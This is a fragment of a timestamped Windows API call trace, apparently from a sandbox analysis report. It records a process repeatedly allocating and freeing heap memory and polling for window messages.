HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.357] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0178.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.357] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0178.357] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def38 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0178.357] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee20 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedf8 | out: hHeap=0x8a0000) returned 1 [0178.358] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0178.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0178.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0178.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0178.358] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0178.358] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0178.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0178.358] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b20 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1770 [0178.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1770 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda68 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0178.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd588 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0178.359] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0178.359] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded08 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd930 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0178.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0178.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0178.360] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0178.360] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0178.361] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3f0 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27c8 [0178.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0178.361] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0178.361] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2898 [0178.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0178.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0178.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0178.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.362] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.362] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.362] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.363] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.363] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.363] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.364] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd810 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0178.364] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba270 [0178.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0178.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.365] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0178.365] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0178.366] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2888 | out: hHeap=0x8a0000) returned 1 [0178.366] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0c0 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba378 [0178.366] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd948 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd708 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd330 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba288 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0178.367] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdae0 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0178.367] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2888 [0178.367] HeapFree (in: 